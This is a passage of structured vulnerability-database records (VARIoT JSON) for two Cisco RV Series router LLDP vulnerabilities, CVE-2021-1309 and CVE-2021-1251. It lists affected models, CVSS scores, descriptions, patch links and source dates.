            "version": "1.0.1.20"
          },
          {
            "model": "rv260",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.0.14"
          },
          {
            "model": "rv260w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.20"
          },
          {
            "model": "rv345p",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.14"
          },
          {
            "model": "rv160",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.14"
          },
          {
            "model": "rv160w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.0.14"
          },
          {
            "model": "rv260p",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.14"
          },
          {
            "model": "rv340",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.0.14"
          },
          {
            "model": "rv260",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.20"
          },
          {
            "model": "rv160w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.20"
          },
          {
            "model": "rv345p",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.0.14"
          },
          {
            "model": "rv160",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.0.14"
          },
          {
            "model": "rv345p",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.20"
          },
          {
            "model": "rv260p",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.0.14"
          },
          {
            "model": "rv132w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.14"
          },
          {
            "model": "rv340",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.20"
          },
          {
            "model": "rv260p",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.20"
          },
          {
            "model": "rv134w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.14"
          },
          {
            "model": "rv160",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.20"
          },
          {
            "model": "rv132w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.0.14"
          },
          {
            "model": "rv345 dual wan gigabit vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv160 vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv260p vpn router with poe",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv260w wireless-ac vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv260 vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "cisco rv134w vdsl2 wireless-ac vpn \u30eb\u30fc\u30bf",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv340 dual wan gigabit vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv160w wireless-ac vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "cisco rv132w adsl2+ wireless-n vpn \u30eb\u30fc\u30bf",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv345p dual wan gigabit poe vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv340w dual wan gigabit wireless-ac vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "link layer discovery protocol",
            "scope": null,
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-35515"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-005331"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1309"
          }
        ]
      },
      "cve": "CVE-2021-1309",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "ADJACENT_NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 8.3,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 6.5,
                "id": "CVE-2021-1309",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 1.9,
                "vectorString": "AV:A/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "ADJACENT_NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 8.3,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 6.5,
                "id": "CNVD-2021-35515",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:A/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "ADJACENT",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 8.8,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 2.8,
                "id": "CVE-2021-1309",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "LOW",
                "attackVector": "ADJACENT",
                "author": "ykramarz@cisco.com",
                "availabilityImpact": "HIGH",
                "baseScore": 7.4,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 2.8,
                "id": "CVE-2021-1309",
                "impactScore": 4.0,
                "integrityImpact": "NONE",
                "privilegesRequired": "NONE",
                "scope": "CHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Adjacent Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 8.8,
                "baseSeverity": "High",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "CVE-2021-1309",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2021-1309",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "ykramarz@cisco.com",
                "id": "CVE-2021-1309",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "NVD",
                "id": "CVE-2021-1309",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2021-35515",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202104-441",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "VULMON",
                "id": "CVE-2021-1309",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-35515"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-1309"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-005331"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-441"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1309"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1309"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Multiple vulnerabilities exist in the Link Layer Discovery Protocol (LLDP) implementation for Cisco Small Business RV Series Routers. An unauthenticated, adjacent attacker could execute arbitrary code or cause an affected router to leak system memory or reload. A memory leak or device reload would cause a denial of service (DoS) condition on an affected device. For more information about these vulnerabilities, see the Details section of this advisory. Note: LLDP is a Layer 2 protocol. To exploit these vulnerabilities, an attacker must be in the same broadcast domain as the affected device (Layer 2 adjacent)",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2021-1309"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-005331"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2021-35515"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-1309"
          }
        ],
        "trust": 2.25
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2021-1309",
            "trust": 3.9
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-005331",
            "trust": 0.8
          },
          {
            "db": "CNVD",
            "id": "CNVD-2021-35515",
            "trust": 0.6
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2021.1171.3",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-441",
            "trust": 0.6
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-1309",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-35515"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-1309"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-005331"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-441"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1309"
          }
        ]
      },
      "id": "VAR-202104-0381",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-35515"
          }
        ],
        "trust": 1.1394850175
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-35515"
          }
        ]
      },
      "last_update_date": "2024-11-23T22:37:02.714000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "cisco-sa-rv-multi-lldp-u7e4chCe",
            "trust": 0.8,
            "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-multi-lldp-u7e4chCe"
          },
          {
            "title": "Patch for Cisco Link Layer Discovery Protocol buffer overflow vulnerability",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/265671"
          },
          {
            "title": "Cisco Link Layer Discovery Protocol Buffer error vulnerability fix",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=147023"
          },
          {
            "title": "Cisco: Cisco Small Business RV Series Routers Link Layer Discovery Protocol Vulnerabilities",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-rv-multi-lldp-u7e4chCe"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-35515"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-1309"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-005331"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-441"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-119",
            "trust": 1.0
          },
          {
            "problemtype": "CWE-401",
            "trust": 1.0
          },
          {
            "problemtype": "Buffer error (CWE-119) [ Other ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-005331"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1309"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.4,
            "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-rv-multi-lldp-u7e4chce"
          },
          {
            "trust": 2.0,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-1309"
          },
          {
            "trust": 0.6,
            "url": "https://www.auscert.org.au/bulletins/esb-2021.1171.3"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/119.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-35515"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-1309"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-005331"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-441"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1309"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-35515"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-1309"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-005331"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-441"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1309"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-05-19T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2021-35515"
          },
          {
            "date": "2021-04-08T00:00:00",
            "db": "VULMON",
            "id": "CVE-2021-1309"
          },
          {
            "date": "2021-12-13T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-005331"
          },
          {
            "date": "2021-04-07T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202104-441"
          },
          {
            "date": "2021-04-08T04:15:12.063000",
            "db": "NVD",
            "id": "CVE-2021-1309"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-05-19T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2021-35515"
          },
          {
            "date": "2021-04-14T00:00:00",
            "db": "VULMON",
            "id": "CVE-2021-1309"
          },
          {
            "date": "2021-12-13T02:45:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-005331"
          },
          {
            "date": "2022-08-08T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202104-441"
          },
          {
            "date": "2024-11-21T05:44:03.693000",
            "db": "NVD",
            "id": "CVE-2021-1309"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote or local",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-441"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Cisco Small Business RV Series router Buffer Error Vulnerability",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-005331"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "buffer error",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-441"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202104-0377

    Vulnerability from variot - Updated: 2024-11-23 22:37

    Multiple vulnerabilities exist in the Link Layer Discovery Protocol (LLDP) implementation for Cisco Small Business RV Series Routers. An unauthenticated, adjacent attacker could execute arbitrary code or cause an affected router to leak system memory or reload. A memory leak or device reload would cause a denial of service (DoS) condition on an affected device. For more information about these vulnerabilities, see the Details section of this advisory. Note: LLDP is a Layer 2 protocol. To exploit these vulnerabilities, an attacker must be in the same broadcast domain as the affected device (Layer 2 adjacent).

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202104-0377",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "rv260w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.14"
          },
          {
            "model": "rv340",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.3.20"
          },
          {
            "model": "rv345p",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.3.20"
          },
          {
            "model": "rv260",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.14"
          },
          {
            "model": "rv160",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.3.20"
          },
          {
            "model": "rv260p",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.3.20"
          },
          {
            "model": "rv160w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.14"
          },
          {
            "model": "rv340",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.14"
          },
          {
            "model": "rv345p",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.14"
          },
          {
            "model": "rv160",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.14"
          },
          {
            "model": "rv132w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.3.20"
          },
          {
            "model": "rv134w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.3.20"
          },
          {
            "model": "rv260p",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.14"
          },
          {
            "model": "rv340w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.3.20"
          },
          {
            "model": "rv345",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.3.20"
          },
          {
            "model": "rv260w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.3.20"
          },
          {
            "model": "rv132w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.14"
          },
          {
            "model": "rv260",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.3.20"
          },
          {
            "model": "rv340w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.14"
          },
          {
            "model": "rv134w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.14"
          },
          {
            "model": "rv345",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.14"
          },
          {
            "model": "rv160w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.3.20"
          },
          {
            "model": "rv345 dual wan gigabit vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv160 vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv260p vpn router with poe",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv260w wireless-ac vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv260 vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "cisco rv134w vdsl2 wireless-ac vpn \u30eb\u30fc\u30bf",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv340 dual wan gigabit vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv160w wireless-ac vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "cisco rv132w adsl2+ wireless-n vpn \u30eb\u30fc\u30bf",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv345p dual wan gigabit poe vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv340w dual wan gigabit wireless-ac vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "link layer discovery protocol",
            "scope": null,
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-26111"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-005330"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1251"
          }
        ]
      },
      "cve": "CVE-2021-1251",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "ADJACENT_NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 6.1,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 6.5,
                "id": "CVE-2021-1251",
                "impactScore": 6.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 1.9,
                "vectorString": "AV:A/AC:L/Au:N/C:N/I:N/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "ADJACENT_NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 6.1,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 6.5,
                "id": "CNVD-2021-26111",
                "impactScore": 6.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 0.6,
                "vectorString": "AV:A/AC:L/Au:N/C:N/I:N/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "ADJACENT",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 7.4,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 2.8,
                "id": "CVE-2021-1251",
                "impactScore": 4.0,
                "integrityImpact": "NONE",
                "privilegesRequired": "NONE",
                "scope": "CHANGED",
                "trust": 2.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Adjacent Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 7.4,
                "baseSeverity": "High",
                "confidentialityImpact": "None",
                "exploitabilityScore": null,
                "id": "CVE-2021-1251",
                "impactScore": null,
                "integrityImpact": "None",
                "privilegesRequired": "None",
                "scope": "Changed",
                "trust": 0.8,
                "userInteraction": "None",
